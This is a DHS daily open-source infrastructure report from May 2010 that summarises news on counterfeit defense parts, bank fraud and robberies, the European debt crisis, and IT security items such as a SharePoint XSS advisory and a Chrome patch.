Department of Homeland Security Daily Open Source Infrastructure Report

Monday, May 3, 2010

Complete DHS Daily Report for May 3, 2010

Daily Report

Top Stories

 According to Reuters, the Government Accountability Office said on April 29 that the U.S. Defense Department lacks sufficient quality-controls to prevent substandard parts from ending up in its weapons and other hardware. It recommended the department step up its efforts to establish anti-counterfeiting guidelines for all Defense Department components and defense contractors. (See item 21)

21. April 29, Reuters – (National) Report says U.S. military vulnerable to bad parts. The U.S. Defense Department lacks sufficient quality-controls to prevent substandard parts from ending up in its weapons and other hardware, U.S. congressional auditors said on Thursday. “Existing procurement and quality-control practices used to identify deficient parts are limited in their ability to prevent and detect counterfeit parts in DoD’s supply chain,” the Government Accountability Office said in its report. It cited as an example what it described as substandard Global Positioning System oscillators used for navigation on more than 4,000 Air Force and Navy systems. Also cited were substandard titanium used in fighter jet engine mounts; brake shoes made from ersatz materials, including seaweed; and electronics from a personal computer repackaged and labeled as a $7,000 military-grade circuit for a missile guidance system. It said counterfeit parts had the potential to cause a serious risk to military supply chains, delay wartime missions and impair weapon systems. GAO, Congress’s audit and investigative arm, said the Defense Department draws from a complex network of global suppliers and manages more than four million different parts at a cost of more than $94 billion. It recommended the department step up its efforts to establish anti-counterfeiting guidelines for all Defense Department components and defense contractors. Source:

 The Associated Press reports that a Dallas man describing himself as a terrorist threatened to kill the U.S. President and “every employee of the federal government” in a March 21 online posting because he was upset about health care reform, according to a criminal complaint. (See item 59)

59. April 29, Associated Press – (National) Texas ‘terrorist’ posts death threat against Obama. A Dallas man describing himself as a terrorist threatened to kill the U.S. President in an online posting because he was upset about health care reform, according to a criminal complaint. The 43-year-old faces one count of making threats against the president. He made the death threats March 21 on Craigslist under a posting titled “Obama must die.” The posting said he was following through on a promise to become a terrorist if the federal health care bill passed. “I am dedicating my life to the death of Obama and every employee of the federal government,” the posting said. It ended with a call to arms: “This is war. Join me. Or don’t. I don’t care. I’m not laying down anymore.” He said, “Today I become a terrorist.” In a separate post the same night, he essentially dared others to turn him in to the Secret Service. A resident of Arlington, Texas reported the threats to the Secret Service. Agents tracked down the suspect at his Dallas home, where he lives with his mother. Police arrested him and seized his computer. They found no weapons in the residence. Source:


Banking and Finance Sector

23. April 30, Courthouse News Service – (Florida; International) Ponzi allegedly targeted Jamaican-Americans. A man says he lost $2.6 million in a “huge Ponzi scheme named OLINT” that targeted Jamaican Americans. He claims the scam was so lucrative that one of its operators, “used the money to purchase the Shell Oil facility in Jamaica for $80 million. The plaintiff sued five people and three organizations in Broward County Court: OLINT, USIMO, and Superclubs. The plaintiff claims he and his investors group put $2.6 million in OLINT, through USIMO, which is or was controlled by one of the suspects. A second suspect’s role was to target Jamaican-Americans for alleged “seminars for foreign exchange trading,” and to promise 10 percent monthly returns, the plaintiff says. USIMO was used to collect money for OLINT “in a corporate structure to hide OLINT’s role from U.S., British and Jamaican authorities,” he adds. He claims the defendants made “huge profits” from the Ponzi scheme, which they “marketed aggressively in Broward County,” including through “feeder clubs.” Source:

24. April 30, BBC – (International) Athens clash at finance ministry over budget cuts. Protesters in Athens clashed with police as a group tried to force its way into the Greek finance ministry. Police fired tear gas to disperse the crowd as the unrest flared over austerity measures that may be taken in return for a massive bailout deal. The European Union (EU) has said it is close to approving the details of an emergency plan to help tackle Greece crippling debt. The EU commission chief said “rapid progress” was being made. Police fired tear gas at hundreds of demonstrators, after some tried to break through a police cordon guarding the Greek finance ministry. The outbreaks came after Greece began talks over extra budget cuts as conditions for the bailout loans. These cuts would be in addition to an already mooted austerity drive aimed at reducing the nation’s public deficit, which is more than four times bigger than the EU limit. Source:

25. April 30, BBC – (National) Goldman Sachs ‘facing criminal inquiry’. Goldman Sachs is under criminal investigation for the way in which it sold complex mortgage-backed products to clients, reports suggest. Earlier this month, the US financial regulator brought civil charges against the bank for defrauding investors. It alleged that Goldman failed to disclose a conflict of interest, in that a firm advising it on a product was betting it would decline in value. Goldman denies the accusations and said it was “not surprised” by the reports. “Given the recent focus on the firm, we are not surprised by the report of a [criminal] inquiry. We would fully co-operate with any requests for information,” a Goldman spokesperson said. The investigation is being run from the US Attorney’s office in New York, according to reports. According to the Wall Street Journal, the criminal probe was underway before the civil charges were laid by the Securities and Exchange Commission. Source:

26. April 29, Computerworld – (Utah) IT contractor gets five years for $2M credit union theft. A Provo, Utah computer contractor was sentenced on April 28 to more than five years in prison after pleading guilty to stealing close to $2 million from four credit unions that he performed IT services for. The judge of the U.S. District Court for the District of Utah also ordered the defendant to repay more than $1.8 million in restitution to his victims and to submit to five years of supervised release upon completion of his prison term. In December, the defendant had pleaded guilty to using his privileged computer access to steal money from Family First Federal Credit Union, Alpine Credit Union, Deseret First Credit Union, and First Credit Union. The defendant was employed as a third-party contractor by Open Source Solutions Inc, a computer services firm in Provo. In that capacity, he was supposed to help the four credit unions upgrade their systems. As part of his job, he was given unrestricted local and remote access to the networks at the credit unions. The defendant used his access to initiate several fictitious Automated Clearing House (ACH) transactions, according to court documents describing the thefts at Family First Federal Credit Union. The transfers were deposited into bank accounts that the defendant owned, including a business account that he operated jointly with a business partner. The defendant used fictitious or previously used ACH “racing numbers” to make the deposits into his accounts, court documents said. In all, the defendant admitted to stealing about $1.2 millions from First Family, about $82,000 from Alpine, about $635,000 from Deseret and $93,000 from First Credit. Source:

27. April 29, Associated Press – (California) ‘Starlet Bandit’ robs 2 LA-area banks. The so-called “Starlet Bandit” has struck again. Authorities say the woman robbed two banks on April 29, both in the San Fernando Valley. She is also linked to a heist on April 27 in Granada Hills. The woman is now believed to be responsible for 10 robberies, eight of which occurred in the past week and a half. The woman is believed to be between 20 and 28 years old and weighs between 140 pounds and 170 pounds. Source:

28. April 29, Federal Bureau of Investigation – (National) Ashburn, Virginia man pleads guilty to $53 million bank fraud. A 31 year old of Ashburn, Viginiia, pleaded guilty on April 29 to operating a fraud scheme that stole more than $53 million from banks throughout the United States. The defendant pled guilty to three counts of bank fraud and one count of money laundering contained in a criminal information filed in the Eastern District of Virginia and an indictment filed in the Northern District of Ohio. Sentencing has been set for July 30, 2010. He faces a maximum penalty of 30 years in prison on each of the bank fraud counts and 10 years in prison on the money laundering count. In a statement of facts filed with his plea agreement, the defendant acknowledged to defrauding banks in Virginia, Ohio, Tennessee and Maryland of more than $53 million. In order to accomplish his fraud, he presented the banks with fraudulent life insurance policies — with purported cash values of millions of dollars — as collateral to obtain the fraudulent loans. The stated purpose of the loans was for various business ventures. To facilitate his scheme, the defendant set up fake domain names, used fake federal express mailings and fake e-mails in order to convince the banks that his collateral was authentic. He used money obtained from his fraud to buy exotic cars and to purchase a multi-million-dollar home in Ashburn, Va. He fled the United States in May 2009 and was later apprehended in Texas in January 2010. Source:

29. April 29, News-Review Today – (Oregon) Oregon Pacific Bank warns public of Internet scam. Oregon Pacific Bank is warning its customers and others of an Internet phishing scam of which it recently became aware. The scam is directed at both Oregon Pacific Bank and non-Oregon Pacific Bank customers, according to a bank news release. An e-mail appearing to be from Oregon Pacific Bank was sent out sometime early Thursday morning, urging the reader to respond and provide confidential information. A link on the e-mail takes the reader to a website that uses the Oregon Pacific Bank logo and images. The reader is asked to provide debit and credit card information and the PIN or password for the account. Oregon Pacific Bank did not send out this e-mail, the release said. Receivers should not open the e-mail and should delete it immediately. According to the release, an outside security firm has investigated and determined that the security, computer systems and data of Oregon Pacific Bank customers have not been breached. Phishing scams, such as this one, are becoming increasingly common, the release said. Source:

30. April 29, Chicago Sun-Times – (Illinois) Double dip bandit hits TCF banks. A man who robbed a bank branch in a Northwest Side Jewel store on April 28 may be responsible for robbing three TCF bank branches a total of six times. And it was the second time in the past month the same robber struck at the TCF branch at 6430 W. Irving Park Rd., according to the FBI. The first was March 28 and returning to the scene of the crime has earned him the moniker “Double Dip Bandit.” The suspect is believed to be responsible for six robberies of TCF branches in the area, including two at 1 W. Devon in Park Ridge, three at the Irving Park address, and one at 4734 N. Cumberland in Chicago, the release said. In the April 28 robbery, the suspect — white, 35 to 40, 5-foot-11 to 6-foot-2 with a slight goatee — walked up to the teller in the Jewel, showed a handgun and verbally announced a robbery, a FBI spokeswoman said. There have been at least 56 bank robberies reported in the Chicago area so far in 2010, according to the FBI. Source:

31. April 29, Deseret News – (Utah) Crews investigate white powder scare at Salt Lake City business. Hazmat crews are investigating a white powder found inside an envelope at the Discover Financial Services building, 5420 West 1738 South. There have been no evacuations, and no one has reported any health problems, said a Salt Lake City police detective. An employee discovered the powder after opening an envelope about 11:30 a.m. The situation and the employees were isolated, and no evacuations were necessary, he said. Salt Lake City fire crews decontaminated employees who were exposed to the unknown substance. Tests were being conducted to determine what the substance is. Source:

32. April 29, Associated Press – (New York) Workers march on Wall Street, protest big banks. Thousands of workers and union leaders marched on Wall Street on Thursday to express their anger over lost jobs, the taxpayer-funded bailout of financial institutions and questionable lending practices by big banks. The rally was organized by the AFL-CIO and an association of community groups. It included a diverse mixture of union workers, activists, the unemployed, and homeowners threatened by foreclosure. The protesters, carrying signs saying “Wall Street Overdrafted Our Economy” and “Reclaim America,” rallied at City Hall Park, then marched down to the Merrill Lynch Bull statue demanding good jobs and accountability from banks. Earlier in the day, noisy protesters with signs took over two bank building lobbies on Manhattan’s Park Avenue in a prelude to the rally. More than 100 people entered a midtown building housing JPMorgan Chase offices. They handed a bank executive a letter requesting a meeting with the CEO, and chanted “Bust up! Big banks!” and “People power!” A half-hour later, they were calmly escorted outside by officers. They then walked a few blocks up the avenue and crowded into the lobby of the Seagram Building, where Wells Fargo and Wachovia, the bank it merged with in 2008, have offices. The protesters held up signs reading, “Save Our Jobs” and “Save Our Homes.” Police arrived on horseback. Source:

33. April 28, Tribune Washington Bureau – (International) Europe’s widening financial crisis threatens to put damper on U.S., global recovery. Just as the American economy was gathering steam — with consumers starting to spend more and the housing market showing signs of stabilizing — a widening financial crisis in Europe is threatening to put a damper on the recovery both here and abroad. Germany offered a hopeful word on April 28, putting aside months of reluctance and saying it could rush through a plan to foot its share of an International Monetary Fund-European Union bailout for Greece that now looks to exceed $132 billion. But the credit contagion that began in heavily indebted Greece spread to Spain as that much-larger economy’s sovereign rating was downgraded — only one day after Athens’ own bonds were slashed to junk status and Portugal’s debt fell as well. And despite German officials’ pledge to act swiftly, many economists saw a likelihood of damaging fallout from the crisis. A European specialist at the Peterson Institute for International Economics in Washington said he doubts there is enough political will in Germany to back such a hefty bailout plan, and even if it does, the government is likely to face constitutional challenges to taking such measures. U.S. banks have relatively little exposure to debt from Greece and other at-risk EU countries such as Portugal and Spain. But the collateral effects of a financial meltdown in Europe would be damaging to the American and global economies. Source:,0,6024638.story

Information Technology

67. April 30, Help Net Security – (International) Low confidence in virtual environment security. There is a significant gap between the speed at which companies are willing to deploy virtualization and their security readiness to address the added complexity that any new technology introduces, according to a Prism Microsystems survey of over 300 IT managers, security personnel, auditors, and administrators. The results of the survey indicate that companies are largely ignoring hypervisor-level security despite acknowledging the importance of monitoring the virtualization layer for risk mitigation. At the hypervisor layer, only 29% are collecting logs, 17% are reporting on activities and controls, 23% are monitoring user activity, and 18% are tracking access to critical data and assets. Other best-practices being ignored include separation of duty, with over 65% indicating that they have not implemented separation of duty between IT personnel responsible for the provisioning of virtual machines/virtual infrastructure and other administrator groups. This raises the risk for abuse by privileged insiders - a concern that is shared by over a third of respondents. A majority of respondents to the survey agree that traditional security products and solutions are insufficient to provide visibility into the virtual environment, yet they continue to use these solutions, citing lack of budget as a primary inhibitor. This implies that in the rush to adopt virtualization, security investments are not being factored in to project budgets. Source:

68. April 30, ZDNet Asia – (International) Easy-to-get Web certs undermine online trust. ”Get ready a credit card and a free Web mail account that is registered as ‘ssladmin.’ Go to a certificate authority (CA), such as VeriSign’s RapidSSL. Now, register online for a secure Web certificate for a domain that may not necessarily be owned by the registrant.” This simple process of attaining a legitimate Web security certificate is a security flaw made known and described in detail by a security expert in a March report on blog site Betanews. It is not a new security concern, either, according to a strategic solutions consultant at RSA, the security division of EMC. In an e-mail interview with ZDNet Asia, he said this is a “well-recognized problem” that security practitioners have known for a “fairly long time”. “The commercial pressures [faced by CAs] led some of these companies to introduce ‘domain validated (DV) only’ SSL certificates, for which minimal verification is made of the details in the certificate,” the consultant elaborated. Another industry player gave further insight into the CA industry. Source:

69. April 29, ComputerWorld – (International) Google patches Chrome for second time this month. Google Inc. patched three vulnerabilities in the Windows version of Chrome recently, marking the second time that it has plugged security holes in the browser in April. The April 27 update to Chrome fixed three flaws rated “high,” the second-most-severe threat ranking in Google’s four-step system. Danish vulnerability tracker Secunia rated the update as “highly critical” under its own severity ranking. As is Google’s practice, technical details of the vulnerabilities were hidden from public view, a tactic the company uses to prevent attackers from accessing the information until the majority of users have updated to the new version. Researchers credited with reporting two of the flaws were awarded bonuses as part of Google’s bug bounty program, which kicked off in January. Most flaws earn their finders $500, but a researcher was handed $1,000 for the cross-origin bypass vulnerability he found in Chrome’s handling of Google URL, a code library used to parse large numbers of Web addresses. Source:

70. April 29, The Register – (International) Microsoft SharePoint bug exposes credentials, sensitive data. Microsoft says it’s investigating a security flaw in older versions of its SharePoint Server product that an independent researcher says can easily expose sensitive data and user authentication credentials. The XSS, or cross-site scripting, vulnerability has been confirmed in SharePoint Server 2007 and is likely also present in earlier versions of the content management system software, an advisory from High-Tech Bridge warned. It allows adversaries to inject malicious javascript into the application by appending commands to the address of the targeted system. “The vulnerability exists due to failure in the ‘/_layouts/help.aspx’ script to properly sanitize user-supplied input in ‘cid0’ variable,” the advisory states. “Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.” A Microsoft spokeswoman said on April 29 that researchers are in the process of drafting a security advisory that includes mitigation and workaround details. With 17 days notice, it’s unclear why Redmond’s security team did not already have that information ready to go. Source:

71. April 29, DarkReading – (International) Researchers lock down the hypervisor. Researchers at North Carolina State University have come up with a tool that aims to eliminate one of the biggest risks to virtualization and cloud computing: attacks on the hypervisor. The so-called HyperSafe prototype blocks any new code — think malware — from getting into the hypervisor and restricts alterations to the hypervisor’s code. The NC State research, funded by the U.S. Army Research Office and the National Science Foundation, focused on using features in the underlying hardware to help armor the hypervisor against attacks. The assistant professor of computer science at NC State and head of the research team that created HyperSafe, says the tool is integrated into the hypervisor itself, and that the research team used it on Xen and BitVisor hypervisors. “Existing hypervisors, such as Xen and BitVisor, need to be modified or extended to include HyperSafe...which enables the hypervisor with self-protection from code-injection attempts,” the assistant professor said. HyperSafe would theoretically block threats, such as Blue Pill and Vitriol — hypervisor rootkits that inject malware into the hypervisor, he says. The tool uses two techniques to secure the hypervisor: nonbypassable memory lockdown and restricted pointer-indexing. Nonbypassable memory lockdown basically blocks any new code from the hypervisor, except for code introduced by the system administrator. So if a user downloads malware that exploits a buffer overflow bug in a hypervisor, it can’t be compromised, according to the research. Source:

72. April 29, SC Magazine – (International) Infosecurity Europe: Data integrity attacks described as a future cyber crime threat. In a keynote panel debate at Infosecurity Europe, data integrity attacks have been described as a real problem and as a future cyber crime threat. The director of Quocirca claimed that attacks on data were an area of concern and the problem lay in how to mitigate against the problem. Commenting, a Jericho Forum board member and global vice president of information security at Commerzbank said: “This is a problem for the industry as a whole, and the main concern is systems protecting against it. Much of security is concentrated on confidentiality and it is not concerned about giving the same degree of protection.” Speaking on behalf of the US Cyber Consequences Unit, a spokesman commented that the largest data integrity attack commonly seen was students changing their grades online, but there was an insider threat challenge with disgruntled employees and “that level of crime in the future is what we are worried about.” The vice president of log management at Tripwire said: “If someone changes data and someone impacts a critical component, there are paths that are able to know what is happening but this is something that a human element will not follow and you have to have clear policies on data, and what it should look like. You should be able to look at the data and see how it was changed, it comes down to managing people, processes and technology.” Source:

Communications Sector

73. April 28, Congress Daily – (National) Questions prompt strong defense of broadband program. A Democrat on the Senate Small Business Committee raised concerns on Tuesday that federal regulators are wasting taxpayer dollars by funding duplicative broadband infrastructure projects as part of the $7.2 billion broadband stimulus program. A New Hampshire senator also pressed the heads of agencies within the Agriculture and Commerce departments on whether their awarding of grants to bring high-speed Internet service to certain parts of the country may have driven up commercial broadband deployment costs in some markets. An assistant commerce secretary who directs the National Telecommunications and Information Administration, responded by saying any claims that duplication exists are “not serious objections.” The assistant commerce secretary said his agency uses data on broadband penetration and speeds when choosing where to allot money, arguing that the need for broadband spending may not be apparent in certain areas where consumers have strong Internet connections in their homes but anchor institutions, including hospitals and schools, continue to lack the necessary infrastructure. Source: